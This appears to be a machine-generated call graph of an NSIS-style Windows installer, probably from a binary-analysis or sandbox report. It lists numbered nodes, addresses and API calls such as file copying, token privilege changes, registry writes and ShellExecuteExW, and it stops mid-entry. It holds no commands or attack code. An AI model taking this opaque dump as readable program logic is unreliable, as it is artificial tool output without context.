3269->3270 3270->3268 3272 4056d0 24 API calls 3271->3272 3273 401431 3272->3273 3274 40666e lstrcpynW 3273->3274 3274->3258 3276 405c30 GetLastError 3275->3276 3277 405c2c 3275->3277 3276->3277 3277->3259 3279 406a61 GetProcAddress 3278->3279 3280 406a57 3278->3280 3281 405c40 3279->3281 3284 4069cb GetSystemDirectoryW 3280->3284 3281->3259 3283 406a5d 3283->3279 3283->3281 3285 4069ed wsprintfW LoadLibraryExW 3284->3285 3285->3283 3759 401c43 3781 402d84 3759->3781 3761 401c4a 3762 402d84 17 API calls 3761->3762 3763 401c57 3762->3763 3764 401c6c 3763->3764 3765 402da6 17 API calls 3763->3765 3766 401c7c 3764->3766 3767 402da6 17 API calls 3764->3767 3765->3764 3768 401cd3 3766->3768 3769 401c87 3766->3769 3767->3766 3770 402da6 17 API calls 3768->3770 3771 402d84 17 API calls 3769->3771 3772 401cd8 3770->3772 3773 401c8c 3771->3773 3774 402da6 17 API calls 3772->3774 3775 402d84 17 API calls 3773->3775 3776 401ce1 FindWindowExW 3774->3776 3777 401c98 3775->3777 3780 401d03 3776->3780 3778 401cc3 SendMessageW 3777->3778 3779 401ca5 SendMessageTimeoutW 3777->3779 3778->3780 3779->3780 3782 4066ab 17 API calls 3781->3782 3783 402d99 3782->3783 3783->3761 3784 405644 3785 405654 3784->3785 3786 405668 3784->3786 3788 4056b1 3785->3788 3789 40565a 3785->3789 3787 405670 IsWindowVisible 3786->3787 3795 405687 3786->3795 3787->3788 3790 40567d 3787->3790 3791 4056b6 CallWindowProcW 3788->3791 3792 404616 SendMessageW 3789->3792 3797 404f85 SendMessageW 3790->3797 3794 405664 3791->3794 3792->3794 3795->3791 3802 405005 3795->3802 3798 404fe4 SendMessageW 3797->3798 3799 404fa8 GetMessagePos ScreenToClient SendMessageW 3797->3799 3801 404fdc 3798->3801 3800 404fe1 3799->3800 3799->3801 3800->3798 3801->3795 3811 40666e lstrcpynW 3802->3811 3804 405018 3812 4065b5 wsprintfW 3804->3812 3806 405022 3807 40140b 2 API calls 3806->3807 3808 40502b 3807->3808 3813 40666e lstrcpynW 3808->3813 3810 405032 3810->3788 3811->3804 3812->3806 3813->3810 3814 4028c4 3815 4028ca 3814->3815 3816 4028d2 FindClose 3815->3816 3817 402c2a 3815->3817 3816->3817 3315 403646 SetErrorMode GetVersionExW 3316 4036d0 3315->3316 3317 403698 GetVersionExW 3315->3317 3318 403729 3316->3318 3319 406a3b 5 API calls 3316->3319 3317->3316 3320 4069cb 3 API calls 3318->3320 3319->3318 3321 40373f lstrlenA 3320->3321 3321->3318 3322 40374f 3321->3322 3323 406a3b 5 API calls 3322->3323 3324 403756 3323->3324 3325 406a3b 5 API calls 3324->3325 3326 40375d 3325->3326 3327 406a3b 5 API calls 3326->3327 3328 403769 #17 OleInitialize SHGetFileInfoW 3327->3328 3405 40666e lstrcpynW 3328->3405 3331 4037b6 GetCommandLineW 3406 40666e lstrcpynW 3331->3406 3333 4037c8 3334 405f6a CharNextW 3333->3334 3335 4037ee CharNextW 3334->3335 3345 4037ff 3335->3345 3336 4038fd 3337 403911 GetTempPathW 3336->3337 3407 403615 3337->3407 3339 403929 3340 403983 DeleteFileW 3339->3340 3341 40392d GetWindowsDirectoryW lstrcatW 3339->3341 3417 4030d0 GetTickCount GetModuleFileNameW 3340->3417 3343 403615 12 API calls 3341->3343 3342 405f6a CharNextW 3342->3345 3346 403949 3343->3346 3345->3336 3345->3342 3349 4038ff 3345->3349 3346->3340 3348 40394d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3346->3348 3347 403996 3350 403b72 ExitProcess OleUninitialize 3347->3350 3354 403a4b 3347->3354 3360 405f6a CharNextW 3347->3360 3353 403615 12 API calls 3348->3353 3502 40666e lstrcpynW 3349->3502 3351 403b82 3350->3351 3352 403b97 3350->3352 3507 405cce 3351->3507 3357 403c15 ExitProcess 3352->3357 3358 403b9f GetCurrentProcess OpenProcessToken 3352->3358 3359 40397b 3353->3359 3446 403d1d 3354->3446 3365 403be5 3358->3365 3366 403bb6 LookupPrivilegeValueW AdjustTokenPrivileges 3358->3366 3359->3340 3359->3350 3371 4039b8 3360->3371 3362 403a5a 3362->3350 3367 406a3b 5 API calls 3365->3367 3366->3365 3370 403bec 3367->3370 3368 403a21 3373 406045 18 API calls 3368->3373 3369 403a62 3372 405c39 5 API calls 3369->3372 3374 403c01 ExitWindowsEx 3370->3374 3375 403c0e 3370->3375 3371->3368 3371->3369 3376 403a67 lstrcatW 3372->3376 3377 403a2d 3373->3377 3374->3357 3374->3375 3511 40140b 3375->3511 3379 403a83 lstrcatW lstrcmpiW 3376->3379 3380 403a78 lstrcatW 3376->3380 3377->3350 3503 40666e lstrcpynW 3377->3503 3379->3362 3381 403aa3 3379->3381 3380->3379 3383 403aa8 3381->3383 3384 403aaf 3381->3384 3386 405b9f 4 API calls 3383->3386 3387 405c1c 2 API calls 3384->3387 3385 403a40 3504 40666e lstrcpynW 3385->3504 3389 403aad 3386->3389 3390 403ab4 SetCurrentDirectoryW 3387->3390 3389->3390 3391 403ad1 3390->3391 3392 403ac6 3390->3392 3506 40666e lstrcpynW 3391->3506 3505 40666e lstrcpynW 3392->3505 3395 4066ab 17 API calls 3396 403b13 DeleteFileW 3395->3396 3397 403b1f CopyFileW 3396->3397 3402 403ade 3396->3402 3397->3402 3398 403b69 3399 40642e 36 API calls 3398->3399 3399->3362 3400 40642e 36 API calls 3400->3402 3401 4066ab 17 API calls 3401->3402 3402->3395 3402->3398 3402->3400 3402->3401 3403 405c51 2 API calls 3402->3403 3404 403b53 CloseHandle 3402->3404 3403->3402 3404->3402 3405->3331 3406->3333 3408 4068f5 5 API calls 3407->3408 3410 403621 3408->3410 3409 40362b 3409->3339 3410->3409 3411 405f3d 3 API calls 3410->3411 3412 403633 3411->3412 3413 405c1c 2 API calls 3412->3413 3414 403639 3413->3414 3514 40618d 3414->3514 3518 40615e GetFileAttributesW CreateFileW 3417->3518 3419 403113 3445 403120 3419->3445 3519 40666e lstrcpynW 3419->3519 3421 403136 3422 405f89 2 API calls 3421->3422 3423 40313c 3422->3423 3520 40666e lstrcpynW 3423->3520 3425 403147 GetFileSize 3426 403246 3425->3426 3428 40315e 3425->3428 3521 40302e 3426->3521 3428->3426 3432 4032e4 3428->3432 3439 40302e 32 API calls 3428->3439 3428->3445 3552 4035e8 3428->3552 3430 403289 GlobalAlloc 3435 40618d 2 API calls 3430->3435 3433 40302e 32 API calls 3432->3433 3433->3445 3437 4032b4 CreateFileW 3435->3437 3436 40326a 3438 4035e8 ReadFile 3436->3438 3440 4032ee 3437->3440 3437->3445 3442 403275 3438->3442 3439->3428 3536 4035fe SetFilePointer 3440->3536 3442->3430 3442->3445 3443 4032fc 3537 403377 3443->3537 3445->3347 3447 406a3b 5 API calls 3446->3447 3448 403d31 3447->3448 3449 403d37 GetUserDefaultUILanguage 3448->3449 3450 403d49 3448->3450 3572 4065b5 wsprintfW 3449->3572 3452 40653c 3 API calls 3450->3452 3454 403d79 3452->3454 3453 403d47 3573 403ff3 3453->3573 3455 403d98 lstrcatW 3454->3455 3456 40653c 3 API calls 3454->3456 3455->3453 3456->3455 3459 406045 18 API calls 3460 403dca 3459->3460 3461 403e5e 3460->3461 3463 40653c 3 API calls 3460->3463 3462 406045 18 API calls 3461->3462 3464 403e64 3462->3464 3465 403dfc 3463->3465 3466 403e74 LoadImageW 3464->3466 3467 4066ab 17 API calls 3464->3467 3465->3461 3470 403e1d lstrlenW 3465->3470 3474 405f6a CharNextW 3465->3474 3468 403f1a 3466->3468 3469 403e9b RegisterClassW 3466->3469 3467->3466 3473 40140b 2 API calls 3468->3473 3471 403ed1 SystemParametersInfoW CreateWindowExW 3469->3471 3472 403f24 3469->3472 3475 403e51 3470->3475 3476 403e2b lstrcmpiW 3470->3476 3471->3468 3472->3362 3477 403f20 3473->3477 3478 403e1a 3474->3478 3480 405f3d 3 API calls 3475->3480 3476->3475 3479 403e3b GetFileAttributesW 3476->3479 3477->3472 3483 403ff3 18 API calls 3477->3483 3478->3470 3482 403e47 3479->3482 3481 403e57 3480->3481 3581 40666e lstrcpynW 3481->3581 3482->3475 3486 405f89 2 API calls 3482->3486 3484 403f31 3483->3484 3487 403fc0 3484->3487 3488 403f3d ShowWindow 3484->3488 3486->3475 3582 4057a3 OleInitialize 3487->3582 3489 4069cb 3 API calls 3488->3489 3494 403f55 3489->3494 3491 403fc6 3492 403fe2 3491->3492 3495 403fca 3491->3495 3496 40140b 2 API calls 3492->3496 3493 403f63 GetClassInfoW 3498 403f77 GetClassInfoW RegisterClassW 3493->3498 3499 403f8d DialogBoxParamW 3493->3499 3494->3493 3497 4069cb 3 API calls 3494->3497 3495->3472 3500 40140b 2 API calls 3495->3500 3496->3472 3497->3493 3498->3499 3501 40140b 2 API calls 3499->3501 3500->3472 3501->3472 3502->3337 3503->3385 3504->3354 3505->3391 3506->3402 3508 405ce3 3507->3508 3509 403b8f ExitProcess 3508->3509 3510 405cf7 MessageBoxIndirectW 3508->3510 3510->3509 3512 401389 2 API calls 3511->3512 3513 401420 3512->3513 3513->3357 3515 40619a GetTickCount GetTempFileNameW 3514->3515 3516 4061d0 3515->3516 3517 403644 3515->3517 3516->3515 3516->3517 3517->3339 3518->3419 3519->3421 3520->3425 3522 403057 3521->3522 3523 40303f 3521->3523 3526 403067 GetTickCount 3522->3526 3527 40305f 3522->3527 3524 403048 DestroyWindow 3523->3524 3525 40304f 3523->3525 3524->3525 3525->3430 3525->3445 3555 4035fe SetFilePointer 3525->3555 3526->3525 3529 403075 3526->3529 3528 406a77 2 API calls 3527->3528 3528->3525 3530 4030aa CreateDialogParamW ShowWindow 3529->3530 3531 40307d 3529->3531 3530->3525 3531->3525 3556 403012 3531->3556 3533 40308b wsprintfW 3534 4056d0 24 API calls 3533->3534 3535 4030a8 3534->3535 3535->3525 3536->3443 3538 4033a2 3537->3538 3539 403386 SetFilePointer 3537->3539 3559 40347f GetTickCount 3538->3559 3539->3538 3542 40343f 3542->3445 3543 4061e1 ReadFile 3544 4033c2 3543->3544 3544->3542 3545 40347f 38 API calls 3544->3545 3546 4033d9 3545->3546 3546->3542 3547 403445 ReadFile 3546->3547 3549 4033e8 3546->3549 3547->3542 3549->3542 3550 4061e1 ReadFile 3549->3550 3551 406210 WriteFile 3549->3551 3550->3549 3551->3549 3553 4061e1 ReadFile 3552->3553 3554 4035fb 3553->3554 3554->3428 3555->3436 3557 403021 3556->3557 3558 403023 MulDiv 3556->3558 3557->3558 3558->3533 3560 4035d7 3559->3560 3561 4034ad 3559->3561 3562 40302e 32 API calls 3560->3562 3571 4035fe SetFilePointer 3561->3571 3568 4033a9 3562->3568 3564 4034b8 SetFilePointer 3567 4034dd 3564->3567 3565 4035e8 ReadFile 3565->3567 3566 40302e 32 API calls 3566->3567 3567->3565 3567->3566 3567->3568 3569 406210 WriteFile 3567->3569 3570 4035b8 SetFilePointer 3567->3570 3568->3542 3568->3543 3569->3567 3570->3560 3571->3564 3572->3453 3574 404007 3573->3574 3589 4065b5 wsprintfW 3574->3589 3576 404078 3590 4040ac 3576->3590 3578 403da8 3578->3459 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3461 3593 404616 3582->3593 3584 4057c6 3588 4057ed 3584->3588 3596 401389 3584->3596 3585 404616 SendMessageW 3586 4057ff OleUninitialize 3585->3586 3586->3491 3588->3585 3589->3576 3591 4066ab 17 API calls 3590->3591 3592 4040ba SetWindowTextW 3591->3592 3592->3579 3594 40462e 3593->3594 3595 40461f SendMessageW 3593->3595 3594->3584 3595->3594 3598 401390 3596->3598 3597 4013fe 3597->3584 3598->3597 3599 4013cb MulDiv SendMessageW 3598->3599 3599->3598 3600 4040cb 3601 4040e3 3600->3601 3602 404244 3600->3602 3601->3602 3603 4040ef 3601->3603 3604 404295 3602->3604 3605 404255 GetDlgItem GetDlgItem 3602->3605 3608 4040fa SetWindowPos 3603->3608 3609 40410d 3603->3609 3607 4042ef 3604->3607 3617 401389 2 API calls 3604->3617 3676 4045ca 3605->3676 3611 404616 SendMessageW 3607->3611 3618 40423f 3607->3618 3608->3609 3612 404116 ShowWindow 3609->3612 3613 404158 3609->3613 3610 40427f KiUserCallbackDispatcher 3614 40140b 2 API calls 3610->3614 3619 404301 3611->3619 3620 404231 3612->3620 3621 404136 GetWindowLongW 3612->3621 3615 404160 DestroyWindow 3613->3615 3616 404177 3613->3616 3614->3604 3623 404574 3615->3623 3624 40417c SetWindowLongW 3616->3624 3625 40418d 3616->3625 3626 4042c7 3617->3626 3628 404555 DestroyWindow EndDialog 3619->3628 3631 40140b 2 API calls 3619->3631 3634 4066ab 17 API calls 3619->3634 3639 4045ca 18 API calls 3619->3639 3648 4045ca 18 API calls 3619->3648 3682 404631 3620->3682 3621->3620 3622 40414f ShowWindow 3621->3622 3622->3613 3623->3618 3632 404584 ShowWindow 3623->3632 3624->3618 3625->3620 3629 404199 GetDlgItem 3625->3629 3626->3607 3630 4042cb SendMessageW 3626->3630 3628->3623 3633 4041aa SendMessageW IsWindowEnabled 3629->3633 3635 4041c7 3629->3635 3630->3618 3631->3619 3632->3618 3633->3618 3633->3635 3634->3619 3636 4041cc 3635->3636 3637 4041d4 3635->3637 3640 40421b SendMessageW 3635->3640 3641 4041e7 3635->3641 3679 4045a3 3636->3679 3637->3636 3637->3640 3639->3619 3640->3620 3643 404204 3641->3643 3644 4041ef 3641->3644 3642 404202 3642->3620 3646 40140b 2 API calls 3643->3646 3645 40140b 2 API calls 3644->3645 3645->3636 3647 40420b 3646->3647 3647->3620 3647->3636 3649 40437c GetDlgItem 3648->3649 3650 404391 3649->3650 3651 404399 ShowWindow EnableWindow 3649->3651 3650->3651 3696 4045ec EnableWindow 3651->3696 3653 4043c3 EnableWindow 3658 4043d7 3653->3658 3654 4043dc GetSystemMenu EnableMenuItem SendMessageW 3655 40440c SendMessageW 3654->3655 3654->3658 3655->3658 3657 4040ac 18 API calls 3657->3658 3658->3654 3658->3657 3697 4045ff SendMessageW 3658->3697 3698 40666e lstrcpynW 3658->3698 3660 40443b lstrlenW 3661 4066ab 17 API calls 3660->3661 3662 404451 SetWindowTextW 3661->3662 3663 401389 2 API calls 3662->3663 3665 404462 3663->3665 3664 404495 DestroyWindow 3664->3623 3666 4044af CreateDialogParamW 3664->3666 3665->3618 3665->3619 3665->3664 3667 404490 3665->3667 3666->3623 3668 4044e2 3666->3668 3667->3618 3669 4045ca 18 API calls 3668->3669 3670 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3669->3670 3671 401389 2 API calls 3670->3671 3672 404533 3671->3672 3672->3618 3673 40453b ShowWindow 3672->3673 3674 404616 SendMessageW 3673->3674 3675 404553 3674->3675 3675->3623 3677 4066ab 17 API calls 3676->3677 3678 4045d5 SetDlgItemTextW 3677->3678 3678->3610 3680 4045b0 SendMessageW 3679->3680 3681 4045aa 3679->3681 3680->3642 3681->3680 3683 404649 GetWindowLongW 3682->3683 3684 4046f4 3682->3684 3683->3684 3685 40465e 3683->3685 3684->3618 3685->3684 3686 40468b GetSysColor 3685->3686 3687 40468e 3685->3687 3686->3687 3688 404694 SetTextColor 3687->3688 3689 40469e SetBkMode 3687->3689 3688->3689 3690 4046b6 GetSysColor 3689->3690 3691 4046bc 3689->3691 3690->3691 3692 4046c3 SetBkColor 3691->3692 3693 4046cd 3691->3693 3692->3693 3693->3684 3694 4046e0 DeleteObject 3693->3694 3695 4046e7 CreateBrushIndirect 3693->3695 3694->3695 3695->3684 3696->3653 3697->3658 3698->3660 3821 4016cc 3822 402da6 17 API calls 3821->3822 3823 4016d2 GetFullPathNameW 3822->3823 3824 4016ec 3823->3824 3830 40170e 3823->3830 3827 4069a4 2 API calls 3824->3827 3824->3830 3825 401723 GetShortPathNameW 3826 402c2a 3825->3826 3828 4016fe 3827->3828 3828->3830 3831 40666e lstrcpynW 3828->3831 3830->3825 3830->3826 3831->3830 3832 401e4e GetDC 3833 402d84 17 API calls 3832->3833 3834 401e60 GetDeviceCaps MulDiv ReleaseDC 3833->3834 3835 402d84 17 API calls 3834->3835 3836 401e91 3835->3836 3837 4066ab 17 API calls 3836->3837 3838 401ece CreateFontIndirectW 3837->3838 3839 402638 3838->3839 3840 402950 3841 402da6 17 API calls 3840->3841 3843 40295c 3841->3843 3842 402972 3845 406139 2 API calls 3842->3845 3843->3842 3844 402da6 17 API calls 3843->3844 3844->3842 3846 402978 3845->3846 3868 40615e GetFileAttributesW CreateFileW 3846->3868 3848 402985 3849 402a3b 3848->3849 3852 4029a0 GlobalAlloc 3848->3852 3853 402a23 3848->3853 3850 402a42 DeleteFileW 3849->3850 3851 402a55 3849->3851 3850->3851 3852->3853 3854 4029b9 3852->3854 3855 403377 40 API calls 3853->3855 3869 4035fe SetFilePointer 3854->3869 3857 402a30 CloseHandle 3855->3857 3857->3849 3858 4029bf 3859 4035e8 ReadFile 3858->3859 3860 4029c8 GlobalAlloc 3859->3860 3861 4029d8 3860->3861 3862 402a0c 3860->3862 3863 403377 40 API calls 3861->3863 3864 406210 WriteFile 3862->3864 3867 4029e5 3863->3867 3865 402a18 GlobalFree 3864->3865 3865->3853 3866 402a03 GlobalFree 3866->3862 3867->3866 3868->3848 3869->3858 3870 401956 3871 402da6 17 API calls 3870->3871 3872 40195d lstrlenW 3871->3872 3873 402638 3872->3873 3874 4014d7 3875 402d84 17 API calls 3874->3875 3876 4014dd Sleep 3875->3876 3878 402c2a 3876->3878 3879 4020d8 3880 40219c 3879->3880 3881 4020ea 3879->3881 3884 401423 24 API calls 3880->3884 3882 402da6 17 API calls 3881->3882 3883 4020f1 3882->3883 3885 402da6 17 API calls 3883->3885 3889 4022f6 3884->3889 3886 4020fa 3885->3886 3887 402110 LoadLibraryExW 3886->3887 3888 402102 GetModuleHandleW 3886->3888 3887->3880 3890 402121 3887->3890 3888->3887 3888->3890 3899 406aaa 3890->3899 3893 402132 3896 401423 24 API calls 3893->3896 3897 402142 3893->3897 3894 40216b 3895 4056d0 24 API calls 3894->3895 3895->3897 3896->3897 3897->3889 3898 40218e FreeLibrary 3897->3898 3898->3889 3904 406690 WideCharToMultiByte 3899->3904 3901 406ac7 3902 40212c 3901->3902 3903 406ace GetProcAddress 3901->3903 3902->3893 3902->3894 3903->3902 3904->3901 3905 402b59 3906 402b60 3905->3906 3907 402bab 3905->3907 3909 402ba9 3906->3909 3911 402d84 17 API calls 3906->3911 3908 406a3b 5 API calls 3907->3908 3910 402bb2 3908->3910 3912 402da6 17 API calls 3910->3912 3913 402b6e 3911->3913 3914 402bbb 3912->3914 3915 402d84 17 API calls 3913->3915 3914->3909 3916 402bbf IIDFromString 3914->3916 3918 402b7a 3915->3918 3916->3909 3917 402bce 3916->3917 3917->3909 3923 40666e lstrcpynW 3917->3923 3922 4065b5 wsprintfW 3918->3922 3920 402beb CoTaskMemFree 3920->3909 3922->3909 3923->3920 3924 402a5b 3925 402d84 17 API calls 3924->3925 3926 402a61 3925->3926 3927 402aa4 3926->3927 3928 402a88 3926->3928 3935 40292e 3926->3935 3929 402abe 3927->3929 3930 402aae 3927->3930 3931 402a8d 3928->3931 3932 402a9e 3928->3932 3934 4066ab 17 API calls 3929->3934 3933 402d84 17 API calls 3930->3933 3938 40666e lstrcpynW 3931->3938 3932->3935 3939 4065b5 wsprintfW 3932->3939 3933->3932 3934->3932 3938->3935 3939->3935 3940 403cdb 3941 403ce6 3940->3941 3942 403cea 3941->3942 3943 403ced GlobalAlloc 3941->3943 3943->3942 3712 40175c 3713 402da6 17 API calls 3712->3713 3714 401763 3713->3714 3715 40618d 2 API calls 3714->3715 3716 40176a 3715->3716 3717 40618d 2 API calls 3716->3717 3717->3716 3944 401d5d 3945 402d84 17 API calls 3944->3945 3946 401d6e SetWindowLongW 3945->3946 3947 402c2a 3946->3947 3948 4028de 3949 4028e6 3948->3949 3950 4028ea FindNextFileW 3949->3950 3952 4028fc 3949->3952 3951 402943 3950->3951 3950->3952 3954 40666e lstrcpynW 3951->3954 3954->3952 3955 401563 3956 402ba4 3955->3956 3959 4065b5 wsprintfW 3956->3959 3958 402ba9 3959->3958 3960 401968 3961 402d84 17 API calls 3960->3961 3962 40196f 3961->3962 3963 402d84 17 API calls 3962->3963 3964 40197c 3963->3964 3965 402da6 17 API calls 3964->3965 3966 401993 lstrlenW 3965->3966 3968 4019a4 3966->3968 3967 4019e5 3968->3967 3972 40666e lstrcpynW 3968->3972 3970 4019d5 3970->3967 3971 4019da lstrlenW 3970->3971 3971->3967 3972->3970 3973 40166a 3974 402da6 17 API calls 3973->3974 3975 401670 3974->3975 3976 4069a4 2 API calls 3975->3976 3977 401676 3976->3977 3978 402aeb 3979 402d84 17 API calls 3978->3979 3981 402af1 3979->3981 3980 40292e 3981->3980 3982 4066ab 17 API calls 3981->3982 3982->3980 3983 4026ec 3984 402d84 17 API calls 3983->3984 3985 4026fb 3984->3985 3986 402745 ReadFile 3985->3986 3987 4061e1 ReadFile 3985->3987 3989 402785 MultiByteToWideChar 3985->3989 3990 40283a 3985->3990 3992 4027ab SetFilePointer MultiByteToWideChar 3985->3992 3993 40284b 3985->3993 3995 402838 3985->3995 3996 40623f SetFilePointer 3985->3996 3986->3985 3986->3995 3987->3985 3989->3985 4005 4065b5 wsprintfW 3990->4005 3992->3985 3994 40286c SetFilePointer 3993->3994 3993->3995 3994->3995 3997 40625b 3996->3997 4004 406273 3996->4004 3998 4061e1 ReadFile 3997->3998 3999 406267 3998->3999 4000 4062a4 SetFilePointer 3999->4000 4001 40627c SetFilePointer 3999->4001 3999->4004 4000->4004 4001->4000 4002 406287 4001->4002 4003 406210 WriteFile 4002->4003 4003->4004 4004->3985 4005->3995 3718 40176f 3719 402da6 17 API calls 3718->3719 3720 401776 3719->3720 3721 401796 3720->3721 3722 40179e 3720->3722 3757 40666e lstrcpynW 3721->3757 3758 40666e lstrcpynW 3722->3758 3725 40179c 3729 4068f5 5 API calls 3725->3729 3726 4017a9 3727 405f3d 3 API calls 3726->3727 3728 4017af lstrcatW 3727->3728 3728->3725 3745 4017bb 3729->3745 3730 4069a4 2 API calls 3730->3745 3731 406139 2 API calls 3731->3745 3733 4017cd CompareFileTime 3733->3745 3734 40188d 3736 4056d0 24 API calls 3734->3736 3735 401864 3737 4056d0 24 API calls 3735->3737 3746 401879 3735->3746 3739 401897 3736->3739 3737->3746 3738 40666e lstrcpynW 3738->3745 3740 403377 40 API calls 3739->3740 3741 4018aa 3740->3741 3742 4018be SetFileTime 3741->3742 3744 4018d0 FindCloseChangeNotification 3741->3744 3742->3744 3743 4066ab 17 API calls 3743->3745 3744->3746 3747 4018e1 3744->3747 3745->3730 3745->3731 3745->3733 3745->3734 3745->3735 3745->3738 3745->3743 3753 405cce MessageBoxIndirectW 3745->3753 3756 40615e GetFileAttributesW CreateFileW 3745->3756 3748 4018e6 3747->3748 3749 4018f9 3747->3749 3751 4066ab 17 API calls 3748->3751 3750 4066ab 17 API calls 3749->3750 3752 401901 3750->3752 3754 4018ee lstrcatW 3751->3754 3755 405cce MessageBoxIndirectW 3752->3755 3753->3745 3754->3752 3755->3746 3756->3745 3757->3725 3758->3726 4006 401a72 4007 402d84 17 API calls 4006->4007 4008 401a7b 4007->4008 4009 402d84 17 API calls 4008->4009 4010 401a20 4009->4010 4011 401573 4012 401583 ShowWindow 4011->4012 4013 40158c 4011->4013 4012->4013 4014 402c2a 4013->4014 4015 40159a ShowWindow 4013->4015 4015->4014 4016 404a74 4017 404a84 4016->4017 4018 404aaa 4016->4018 4019 4045ca 18 API calls 4017->4019 4020 404631 8 API calls 4018->4020 4021 404a91 SetDlgItemTextW 4019->4021 4022 404ab6 4020->4022 4021->4018 4023 4023f4 4024 402da6 17 API calls 4023->4024 4025 402403 4024->4025 4026 402da6 17 API calls 4025->4026 4027 40240c 4026->4027 4028 402da6 17 API calls 4027->4028 4029 402416 GetPrivateProfileStringW 4028->4029 4030 4014f5 SetForegroundWindow 4031 402c2a 4030->4031 4032 401ff6 4033 402da6 17 API calls 4032->4033 4034 401ffd 4033->4034 4035 4069a4 2 API calls 4034->4035 4036 402003 4035->4036 4038 402014 4036->4038 4039 4065b5 wsprintfW 4036->4039 4039->4038 4040 401b77 4041 402da6 17 API calls 4040->4041 4042 401b7e 4041->4042 4043 402d84 17 API calls 4042->4043 4044 401b87 wsprintfW 4043->4044 4045 402c2a 4044->4045 4046 40167b 4047 402da6 17 API calls 4046->4047 4048 401682 4047->4048 4049 402da6 17 API calls 4048->4049 4050 40168b 4049->4050 4051 402da6 17 API calls 4050->4051 4052 401694 MoveFileW 4051->4052 4053 4016a7 4052->4053 4059 4016a0 4052->4059 4054 4069a4 2 API calls 4053->4054 4055 4022f6 4053->4055 4057 4016b6 4054->4057 4056 401423 24 API calls 4056->4055 4057->4055 4058 40642e 36 API calls 4057->4058 4058->4059 4059->4056 4060 4019ff 4061 402da6 17 API calls 4060->4061 4062 401a06 4061->4062 4063 402da6 17 API calls 4062->4063 4064 401a0f 4063->4064 4065 401a16 lstrcmpiW 4064->4065 4066 401a28 lstrcmpW 4064->4066 4067 401a1c 4065->4067 4066->4067 4068 4022ff 4069 402da6 17 API calls 4068->4069 4070 402305 4069->4070 4071 402da6 17 API calls 4070->4071 4072 40230e 4071->4072 4073 402da6 17 API calls 4072->4073 4074 402317 4073->4074 4075 4069a4 2 API calls 4074->4075 4076 402320 4075->4076 4077 402331 lstrlenW lstrlenW 4076->4077 4078 402324 4076->4078 4080 4056d0 24 API calls 4077->4080 4079 4056d0 24 API calls 4078->4079 4082 40232c 4078->4082 4079->4082 4081 40236f SHFileOperationW 4080->4081 4081->4078 4081->4082 4083 401000 4084 401037 BeginPaint GetClientRect 4083->4084 4085 40100c DefWindowProcW 4083->4085 4086 4010f3 4084->4086 4090 401179 4085->4090 4088 401073 CreateBrushIndirect FillRect DeleteObject 4086->4088 4089 4010fc 4086->4089 4088->4086 4091 401102 CreateFontIndirectW 4089->4091 4092 401167 EndPaint 4089->4092 4091->4092 4093 401112 6 API calls 4091->4093 4092->4090 4093->4092 4094 404700 lstrcpynW lstrlenW 4095 401d81 4096 401d94 GetDlgItem 4095->4096 4097 401d87 4095->4097 4100 401d8e 4096->4100 4098 402d84 17 API calls 4097->4098 4098->4100 4099 401dd5 GetClientRect LoadImageW SendMessageW 4103 401e33 4099->4103 4105 401e3f 4099->4105 4100->4099 4101 402da6 17 API calls 4100->4101 4101->4099 4104 401e38 DeleteObject 4103->4104 4103->4105 4104->4105 4106 401503 4107 40150b 4106->4107 4109 40151e 4106->4109 4108 402d84 17 API calls 4107->4108 4108->4109 4110 402383 4111 40238a 4110->4111 4113 40239d 4110->4113 4112 4066ab 17 API calls 4111->4112 4114 402397 4112->4114 4115 405cce MessageBoxIndirectW 4114->4115 4115->4113 4116 402c05 SendMessageW 4117 402c1f InvalidateRect 4116->4117 4118 402c2a 4116->4118 4117->4118 4119 404789 4121 4048bb 4119->4121 4122 4047a1 4119->4122 4120 404925 4123 4049ef 4120->4123 4124 40492f GetDlgItem 4120->4124 4121->4120 4121->4123 4130 4048f6 GetDlgItem SendMessageW 4121->4130 4125 4045ca 18 API calls 4122->4125 4129 404631 8 API calls 4123->4129 4126 4049b0 4124->4126 4127 404949 4124->4127 4128 404808 4125->4128 4126->4123 4133 4049c2 4126->4133 4127->4126 4132 40496f SendMessageW LoadCursorW SetCursor 4127->4132 4131 4045ca 18 API calls 4128->4131 4143 4049ea 4129->4143 4152 4045ec EnableWindow 4130->4152 4136 404815 CheckDlgButton 4131->4136 4156 404a38 4132->4156 4138 4049d8 4133->4138 4139 4049c8 SendMessageW 4133->4139 4135 404920 4153 404a14 4135->4153 4150 4045ec EnableWindow 4136->4150 4138->4143 4144 4049de SendMessageW 4138->4144 4139->4138 4144->4143 4145 404833 GetDlgItem 4151 4045ff SendMessageW 4145->4151 4147 404849 SendMessageW 4148 404866 GetSysColor 4147->4148 4149 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4147->4149 4148->4149 4149->4143 4150->4145 4151->4147 4152->4135 4154 404a22 4153->4154 4155 404a27 SendMessageW 4153->4155 4154->4155 4155->4120 4159 405c94 ShellExecuteExW 4156->4159 4158 40499e LoadCursorW SetCursor 4158->4126 4159->4158 4160 40248a 4161 402da6 17 API calls 4160->4161 4162 40249c 4161->4162 4163 402da6 17 API calls 4162->4163 4164 4024a6 4163->4164 4177 402e36 4164->4177 4167 4024de 4168 4024ea 4167->4168 4172 402d84 17 API calls 4167->4172 4173 402509 RegSetValueExW 4168->4173 4174 403377 40 API calls 4168->4174 4169 40292e 4170 402da6 17 API calls 4171 4024d4 lstrlenW 4170->4171 4171->4167 4172->4168 4175 40251f RegCloseKey 4173->4175 4174->4173 4175->4169 4178 402e51 4177->4178 4181 406509 4178->4181 4182 406518 4181->4182 4183 406523 RegCreateKeyExW 4182->4183 4184 4024b6 4182->4184 4183->4184 4184->4167 4184->4169 4184->4170 4185 40290b 4186 402da6 17 API calls 4185->4186 4187 402912 FindFirstFileW 4186->4187 4188 40293a 4187->4188 4192 402925 4187->4192 4193 4065b5 wsprintfW 4188->4193 4190 402943 4194 40666e lstrcpynW 4190->4194 4193->4190 4194->4192 4195 40190c 4196 401943 4195->4196 4197 402da6 17 API calls 4196->4197 4198 401948 4197->4198 4199 405d7a 67 API calls 4198->4199 4200 401951 4199->4200 4201 40190f 4202 402da6 17 API calls 4201->4202 4203 401916 4202->4203 4204 405cce MessageBoxIndirectW 4203->4204 4205 40191f 4204->4205 4206 40580f 4207 405830 GetDlgItem GetDlgItem GetDlgItem 4206->4207 4208 4059b9 4206->4208 4251 4045ff SendMessageW 4207->4251 4210 